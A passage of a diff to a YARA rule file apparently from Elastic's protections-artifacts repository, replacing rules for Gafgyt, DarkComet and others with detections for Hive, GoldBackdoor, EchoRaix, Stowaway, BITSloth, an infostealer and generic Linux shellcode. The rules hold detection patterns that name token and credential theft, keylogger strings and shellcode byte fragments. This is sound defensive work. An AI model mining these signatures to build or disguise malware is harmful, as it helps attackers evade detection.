"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Hive.yar#L47-L65" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "50ad0e6e9dc72d10579c20bb436f09eeaa7bfdbcb5747a2590af667823e85609" + logic_hash = "10034d9f53fd5099a423269e0c42c01eac18318f5d11599e1390912c8fd7af25" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "46d86406f7fb25f0e240abc13e86291c56eb7468d0128fdff181f28d4f978058" + fingerprint = "7f2c2d299942390d953599b180ed191d9db999275545a7ba29059fd49b858087" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4C 52 46 00 4B 45 46 31 4A 43 53 00 4B 45 46 31 51 45 42 00 } + $a1 = { 74 C3 8B 44 24 78 8B 08 8B 50 04 8B 40 08 89 0C 24 89 54 24 04 89 44 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_0535Ebf7 : FILE MEMORY +rule ELASTIC_Windows_Backdoor_Goldbackdoor_91902940 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Backdoor Goldbackdoor (Windows.Backdoor.Goldbackdoor)" author = "Elastic Security" - id = "0535ebf7-844f-4207-82ef-e155ceff7a3e" - date = "2022-09-12" - modified = "2022-10-18" + id = "91902940-a291-4fc6-81c5-2cde2328e8d9" + date = "2022-04-29" + modified = "2022-06-09" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1367-L1385" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "77e18bb5479b644ba01d074057c9e2bd532717f6ab3bb88ad2b7497b85d2a5de" - logic_hash = "eb574468e9d371def0da74e6aba827272181399a84388a14ffb167ec6ebd40d1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Backdoor_Goldbackdoor.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "485246b411ef5ea9e903397a5490d106946a8323aaf79e6041bdf94763a0c028" + logic_hash = "71e26cce6d730560e1303b2a4f49d0da6d1341263bb47ade46338f03e528cbf7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2b9b17dad296c0a58a7efa1fb3f71c62bf849f00deb978c1103ab8a480290024" + fingerprint = "83a404a24e54bd05319d3df3a830f1ffe51d30f71ca55d63ca152d5169511df4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F8 48 8B 04 24 6A 18 48 F7 14 24 48 FF 04 24 48 03 24 24 48 8D 64 } + $pdf = "D:\\Development\\GOLD-BACKDOOR\\" + $agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.3112.113 Safari/537.36" + $str0 = "client_id" + $str1 = "client_secret" + $str2 = "redirect_uri" + $str3 = "refresh_token" + $a = { 56 57 8B 7D 08 8B F1 6A 00 6A 00 6A 00 6A 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 46 30 85 C0 75 ?? 33 C0 5F 5E } + $b = { 66 8B 02 83 C2 02 66 85 C0 75 ?? 2B D1 D1 FA 75 ?? 33 C0 E9 ?? ?? ?? ?? 6A 40 8D 45 ?? 6A 00 50 E8 } condition: - all of them + ($pdf and $agent) or ( all of ($str*) and $a and $b) } -rule ELASTIC_Linux_Trojan_Gafgyt_32A7Edd2 : FILE MEMORY +rule ELASTIC_Windows_Backdoor_Goldbackdoor_F11D57Df : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Backdoor Goldbackdoor (Windows.Backdoor.Goldbackdoor)" author = "Elastic Security" - id = "32a7edd2-175f-45b3-bf3d-8c842e4ae7e7" - date = "2022-09-12" - modified = "2022-10-18" + id = "f11d57df-8dd4-481c-a557-f83ae05d53fe" + date = "2022-04-29" + modified = "2022-06-09" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1387-L1405" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "79a75c8aa5aa0d1edef5965e1bcf8ba2f2a004a77833a74870b8377d7fde89cf" - logic_hash = "af26549c1cad0975735e2c233bc71e5e1b0e283d02552fdaea02656332ecd854" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Backdoor_Goldbackdoor.yar#L28-L51" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45ece107409194f5f1ec2fbd902d041f055a914e664f8ed2aa1f90e223339039" + logic_hash = "6401b215523289a3842dec6d3e016a2ca99512c5889e87cb5ff13023bb0b8e1e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d59183e8833272440a12b96de82866171f7ea0212cee0e2629c169fdde4da2a5" + fingerprint = "fed0317d43910d962908604812c2cd1aff6e67f7e245c82b39f2ac6dc14b6edb" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 75 FD 48 FD 45 FD 0F FD 00 FD FD 0F FD FD 02 00 00 48 FD 45 } + $a = { C7 45 ?? 64 69 72 25 C7 45 ?? 5C 53 79 73 C7 45 ?? 74 65 6D 33 C7 45 ?? 32 5C 00 00 C7 45 ?? 2A 2E 65 78 C7 45 ?? 65 00 00 00 E8 ?? ?? ?? ?? FF D0 } + $b = { B9 18 48 24 9D E8 ?? ?? ?? ?? FF D0 } + $c = { B9 F8 92 FA 98 E8 ?? ?? ?? ?? FF D0 } + $a1 = { 64 A1 30 00 00 00 53 55 56 } + $b1 = { B9 76 DB 7A AA 6A 40 68 00 30 00 00 FF 75 ?? 50 E8 ?? ?? ?? ?? FF D0 } + $c1 = { B9 91 51 13 EE 50 68 80 00 00 00 6A 04 50 50 ?? ?? ?? ?? ?? ?? ?? 6A 04 50 E8 ?? ?? ?? ?? FF D0 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_D7F35B54 : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Echoraix_Ea9532Df : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Ransomware Echoraix (Linux.Ransomware.EchoRaix)" author = "Elastic Security" - id = "d7f35b54-82a8-4ef0-8c8c-30a6734223e1" - date = "2022-09-12" - modified = "2022-10-18" + id = "ea9532df-1136-4b11-bf4f-8838074f4e66" + date = "2023-07-27" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1407-L1425" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "79a75c8aa5aa0d1edef5965e1bcf8ba2f2a004a77833a74870b8377d7fde89cf" - logic_hash = "d827e21c09b8dce65db293aa57b39f49f034537bb708471989ad64e653c479be" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_EchoRaix.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dfe32d97eb48fb2afc295eecfda3196cba5d27ced6217532d119a764071c6297" + logic_hash = "4944f5a2632bfe0abebfa6f658ed3f71e4d97efcb428ed0987e2071dfd66e6a9" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "d01db0f6a169d82d921c76801738108a2f0ef4ef65ea2e104fb80188a3bb73b8" + fingerprint = "f28b340b99ec2b96ee78da50b3fc455c87dca1e898abf008c16ac192556939c5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -73318,28 +73724,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_D7F35B54 : FILE MEMORY os = "linux" strings: - $a = { FD 48 FD 45 FD 48 FD FD FD FD FD FD FD FD FD 48 FD 45 FD 66 } + $a = { 43 58 68 64 4B 74 7A 65 42 59 6C 48 65 58 79 5A 52 62 61 30 2F 6E 65 46 7A 34 49 7A 67 53 38 4C 68 75 36 38 5A 75 4C 4C 52 2F 66 67 6E 72 34 79 54 72 5A 54 6B 43 36 31 62 2D 59 6F 6C 49 2F 32 4C 36 66 53 55 46 52 72 55 70 49 34 6D 4E 53 41 4F 62 5F } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_F11E98Be : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Echoraix_Ee0C719A : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Ransomware Echoraix (Linux.Ransomware.EchoRaix)" author = "Elastic Security" - id = "f11e98be-bf81-480e-b2d1-dcc748c6869d" - date = "2022-09-12" - modified = "2022-10-18" + id = "ee0c719a-1f04-45ff-9e49-38028b138fd0" + date = "2023-07-29" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1427-L1445" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "79a75c8aa5aa0d1edef5965e1bcf8ba2f2a004a77833a74870b8377d7fde89cf" - logic_hash = "9b9122f0897610dff6b37446b3cecbfcec3dce8dc7e1934e78cc32d5f6ac9648" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_EchoRaix.yar#L21-L40" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e711b2d9323582aa390cf34846a2064457ae065c7d2ee1a78f5ed0859b40f9c0" + logic_hash = "3ca12ea0f1794935ea570dda83f33d04ffb19b6664cc1c8b1cbeed59ac04a01a" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "8cdf2acffd0cdce48ceaffa6682d2f505c557b873e4f418f4712dfa281a3095a" + fingerprint = "073d62ce55b1940774ffadeb5b76343aa49bd0a36cf82d50e2bae44f6049a1e8" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -73347,57 +73753,66 @@ rule ELASTIC_Linux_Trojan_Gafgyt_F11E98Be : FILE MEMORY os = "linux" strings: - $a = { FD 40 00 09 FD 21 FD FD 08 48 FD 80 3E 00 75 FD FD 4C 24 48 0F FD } + $a1 = { 24 10 89 44 24 68 8B 4C 24 14 8B 54 24 18 85 C9 74 57 74 03 8B } + $a2 = { 6D 61 69 6E 2E 43 68 65 63 6B 49 73 52 75 6E 6E 69 6E 67 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_8D4E4F4A : FILE MEMORY +rule ELASTIC_Multi_Hacktool_Stowaway_89F1D452 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Multi Hacktool Stowaway (Multi.Hacktool.Stowaway)" author = "Elastic Security" - id = "8d4e4f4a-b3ea-4f93-ada2-2c88bb5d806d" - date = "2022-09-12" - modified = "2022-10-18" + id = "89f1d452-f40b-47da-ba75-10c90d67c13b" + date = "2024-06-28" + modified = "2024-07-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1447-L1465" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "79a75c8aa5aa0d1edef5965e1bcf8ba2f2a004a77833a74870b8377d7fde89cf" - logic_hash = "11ee101a936f8e6949701e840ef48a0fe102099ea3b71c790b9a5128e5c59029" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Hacktool_Stowaway.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c073d3be469c8eea0f007bb37c722bad30e06dc994d3a59773838ed8be154c95" + logic_hash = "c5db1335fea606ec32f7a6540ee4dee637dd2ad5aee27e092b89fa03ad085690" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9601c7cf7f2b234bc30d00e1fc0217b5fa615c369e790f5ff9ca42bcd85aea12" + fingerprint = "313e22009ad758c0dd0977c274eb165511591e3d99a8e2dd4be00622668981da" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 50 00 FD FD 00 00 00 31 FD 48 FD FD 01 00 00 00 49 FD FD 04 } + $a1 = "Stowaway/share.ActivePreAuth" ascii fullword + $a2 = "Stowaway/agent/handler" ascii fullword + $a3 = "Origin: http://stowaway:22" ascii fullword + $a4 = "Stowaway/admin.NewAdmin" ascii fullword + $a5 = "Stowaway/global/global.go" ascii fullword + $a6 = "Stowaway/crypto.AESDecrypt" ascii fullword + $a7 = "Stowaway/utils.CheckIfIP4" ascii fullword + $a8 = "Exit Stowaway" + $a9 = "Stowaway/protocol.ConstructMessage" ascii fullword condition: - all of them + 3 of them } -rule ELASTIC_Windows_Trojan_Darkcomet_1Df27Bcc : FILE MEMORY +rule ELASTIC_Windows_Exploit_Fakepipe_6Bc93551 : FILE MEMORY { meta: - description = "Detects Windows Trojan Darkcomet (Windows.Trojan.Darkcomet)" + description = "Detects Windows Exploit Fakepipe (Windows.Exploit.FakePipe)" author = "Elastic Security" - id = "1df27bcc-9f18-48d4-bd7f-73bdc7cb1e63" - date = "2021-08-16" - modified = "2021-10-04" + id = "6bc93551-b528-464b-8f1f-06db58c1cb01" + date = "2024-02-28" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Darkcomet.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7fbe87545eef49da0df850719536bb30b196f7ad2d5a34ee795c01381ffda569" - logic_hash = "5886e3316839e64f934a0e84d85074e076f3e1e44f86fee35a87eb560bfa2aa7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Exploit_FakePipe.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "545a41ccfcd0a4f09c1c62bef2dde61b52fa92abada71ab72b3f4febb9265f75" + logic_hash = "daf78c4a2db337f51054e108b5b54c8aa32300eae3bd39c5fc2d4769221c8aea" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "63b77999860534b71b7b4e7b3da9df175ccd0009f4c13215a59c6b83e0e95b3b" + fingerprint = "e2e31171486ee71bff9450966ba7b68dd0013856f1bda9ff7a30270855332c44" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -73405,90 +73820,97 @@ rule ELASTIC_Windows_Trojan_Darkcomet_1Df27Bcc : FILE MEMORY os = "windows" strings: - $a1 = "BTRESULTHTTP Flood|Http Flood task finished!|" ascii fullword - $a2 = "is now open!|" ascii fullword - $a3 = "ActiveOnlineKeylogger" ascii fullword - $a4 = "#BOT#RunPrompt" ascii fullword - $a5 = "GETMONITORS" ascii fullword + $api = "ImpersonateNamedPipeClient" + $s1 = "\\\\.\\pipe\\%ws\\pipe\\" wide nocase + $s2 = "\\\\.\\pipe\\%s\\pipe\\" wide nocase + $s3 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 00 19 5C 00 70 00 69 00 70 00 65 00 5C } condition: - all of them + $api and any of ($s*) } -rule ELASTIC_Linux_Trojan_Gognt_50C3D9Da : FILE MEMORY +rule ELASTIC_Macos_Infostealer_Mdquerytoken_1C52D574 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gognt (Linux.Trojan.Gognt)" + description = "Detects Macos Infostealer Mdquerytoken (MacOS.Infostealer.MdQueryToken)" author = "Elastic Security" - id = "50c3d9da-0392-4379-aafe-cfe63ade3314" - date = "2021-01-12" - modified = "2021-09-16" + id = "1c52d574-4fb7-4f14-b100-291e3f296c94" + date = "2023-04-11" + modified = "2024-08-19" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gognt.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "79602bc786edda7017c5f576814b683fba41e4cb4cf3f837e963c6d0d42c50ee" - logic_hash = "ecd9cd94b3bf8c50c347e70aab3da03ea6589530b20941a9f62dac501f8144fc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Infostealer_MdQueryToken.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "ede29154aae99bb67075e21acb694b089f9a1b366a4e2505cb761142393994a8" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "a4b7e0c7c2f1b0634f82106ec0625bcdde02296b3e72c9c3aa9c16e40d770b43" + fingerprint = "f603e5383d08050cd84949fb60ce5618c4dfff54bcb3f035290adc1c1cc0e0e1" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 00 00 00 47 6F 00 00 51 76 46 5F 6F 30 59 36 55 72 5F 6C 63 44 } + $string1 = /kMDItemTextContent\s{1,50}==\s{1,50}\S{1,50}token/ ascii wide nocase + $string2 = /kMDItemDisplayName\s{1,50}==\s{1,50}\S{1,50}token\S{1,50}/ ascii wide nocase condition: - all of them + any of ($string1,$string2) } -rule ELASTIC_Linux_Trojan_Gognt_05B10F4B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bitsloth_05Fc3A0A : FILE MEMORY { meta: - description = "Detects Linux Trojan Gognt (Linux.Trojan.Gognt)" + description = "Detects Windows Trojan Bitsloth (Windows.Trojan.BITSloth)" author = "Elastic Security" - id = "05b10f4b-7434-457a-9e8e-d898bb839dce" - date = "2021-01-12" - modified = "2021-09-16" + id = "05fc3a0a-ce19-4042-90f8-32a43f40616e" + date = "2024-07-16" + modified = "2024-07-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gognt.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e43aaf2345dbb5c303d5a5e53cd2e2e84338d12f69ad809865f20fd1a5c2716f" - logic_hash = "1dfc3417f75aa81aea5eda3d6da076f1cacf82dbfc039252b1d16f52b81a5a65" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BITSloth.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0944b17a4330e1c97600f62717d6bae7e4a4260604043f2390a14c8d76ef1507" + logic_hash = "8210dc28cf408f7f836aad3c32868ea21dd0862070c2c37d98b089a80be9285e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fdf7b65f812c17c7f30b3095f237173475cdfb0c10a4b187f751c0599f6b5729" + fingerprint = "520722d4502230eed76b0c53fffb90bd2b818256363bc1393f51c378ff6cdd9b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 7C 24 78 4C 89 84 24 A8 00 00 00 48 29 D7 49 89 F9 48 F7 DF 48 C1 } + $str_1 = "/%s/index.htm?RspID=%d" wide fullword + $str_2 = "/%s/%08x.rpl" wide fullword + $str_3 = "/%s/wu.htm" wide fullword + $str_4 = "GET_DESKDOP" wide fullword + $str_5 = "http://updater.microsoft.com/index.aspx" wide fullword + $str_6 = "[U] update error..." wide fullword + $str_7 = "RMC_KERNEL ..." wide fullword + $seq_global_protocol_check = { 81 3D ?? ?? ?? ?? F9 03 00 00 B9 AC 0F 00 00 0F 46 C1 } + $seq_exit_windows = { 59 85 C0 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A 02 EB ?? 56 EB } condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Bish_974B4B47 : FILE MEMORY +rule ELASTIC_Linux_Shellcode_Generic_5669055F : FILE MEMORY { meta: - description = "Detects Linux Trojan Bish (Linux.Trojan.Bish)" + description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" author = "Elastic Security" - id = "974b4b47-38cf-4460-8ff3-e066e5c8a5fc" + id = "5669055f-8ce7-4163-af06-cb265fde3eef" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Bish.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9171fd2bbe182f0a3cd35937f3ee0076c9358f52f5bc047498dd9e233ae11757" - logic_hash = "c5a7d036c89fe50626da51486d19ee731ad28cbc8d36def075d8f33a7b68961f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Shellcode_Generic.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "87ef4def16d956cdfecaea899cbb55ff59a6739bbb438bf44a8b5fec7fcfd85b" + logic_hash = "735b8dc7fff3c9cc96646a4eb7c5afd70be19dcc821e9e26ce906681130746be" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8858f99934e367b7489d60bfaa74ab57e2ae507a8c06fb29693197792f6f5069" + fingerprint = "616fe440ff330a1d22cacbdc2592c99328ea028700447724d2d5b930554a22f4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -73496,244 +73918,232 @@ rule ELASTIC_Linux_Trojan_Bish_974B4B47 : FILE MEMORY os = "linux" strings: - $a = { 00 31 C0 31 DB 31 C9 B0 17 CD 80 31 C0 50 68 6E } + $a = { 00 31 C0 31 DB 31 C9 B0 17 CD 80 31 C0 51 B1 06 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Winio_C9Cc6D00 : FILE +rule ELASTIC_Linux_Shellcode_Generic_D2C96B1D : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Winio (Windows.VulnDriver.WinIo)" + description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" author = "Elastic Security" - id = "c9cc6d00-b1ed-4bab-b0f7-4f0d6c03bf08" - date = "2022-04-04" - modified = "2022-04-04" + id = "d2c96b1d-f424-476c-9463-dd34a1da524e" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_WinIo.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf" - logic_hash = "4b6a78c2c807cf1f569ae9bc275d42d9c895efba7a2d64fec0652e3cb163d553" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Shellcode_Generic.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "403d53a65bd77856f7c565307af5003b07413f2aba50869655cdd88ce15b0c82" + logic_hash = "33d964e22c8e3046f114e8264d18e8b4a0e7b55eca59151b084db7eea07aa0b1" score = 75 quality = 75 - tags = "FILE" - fingerprint = "d9050466a2894b63ae86ec8888046efb49053edcc20287b9f17a4e6340a9cf92" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "ee042895d863310ff493fdd33721571edd322e764a735381d236b2c0a7077cfa" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\WinioSys.pdb" + $a = { 89 E1 8D 54 24 04 5B B0 0B CD 80 31 C0 B0 01 31 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Vulndriver_Winio_B0F21A70 : FILE +rule ELASTIC_Linux_Shellcode_Generic_30C70926 : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Winio (Windows.VulnDriver.WinIo)" + description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" author = "Elastic Security" - id = "b0f21a70-b563-4b18-8ef9-73885125e88b" - date = "2022-04-04" - modified = "2022-04-04" + id = "30c70926-9414-499a-a4db-7c3bb902dd82" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_WinIo.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374" - logic_hash = "c82d95e805898f9a9a1ffccb483e506df0a53dc420068314e7c724e4947f3572" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Shellcode_Generic.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a742e23f26726293b1bff3db72864471d6bb4062db1cc6e1c4241f51ec0e21b1" + logic_hash = "3594994a911e5428198c472a51de189a6be74895170581ec577c49f8dbb9167a" score = 75 quality = 75 - tags = "FILE" - fingerprint = "00d8142a30e9815f8e4c53443221fc1c3882c8b6f68e77a8ed7ffe4fc8852488" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "4af586211c56e92b1c60fcd09b4def9801086fbe633418459dc07839fe9c735a" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "IOCTL_WINIO_WRITEMSR" + $a = { E3 52 53 89 E1 31 C0 B0 0B CD 80 31 C0 40 CD 80 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Trojan_Guloader_8F10Fa66 : FILE MEMORY +rule ELASTIC_Linux_Shellcode_Generic_224Bdcc4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Guloader (Windows.Trojan.Guloader)" + description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" author = "Elastic Security" - id = "8f10fa66-a24b-4cc2-b9e0-11be14aba9af" - date = "2021-08-17" - modified = "2021-10-04" - reference = "https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Guloader.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a3e2d5013b80cd2346e37460753eca4a4fec3a7941586cc26e049a463277562e" - logic_hash = "f2cd08f6a32c075dc0294a0e26c51e686babc54ced4faa1873368c8821f0bfef" + id = "224bdcc4-4b38-44b5-96c6-d3b378628fa4" + date = "2021-01-12" + modified = "2021-09-16" + reference = 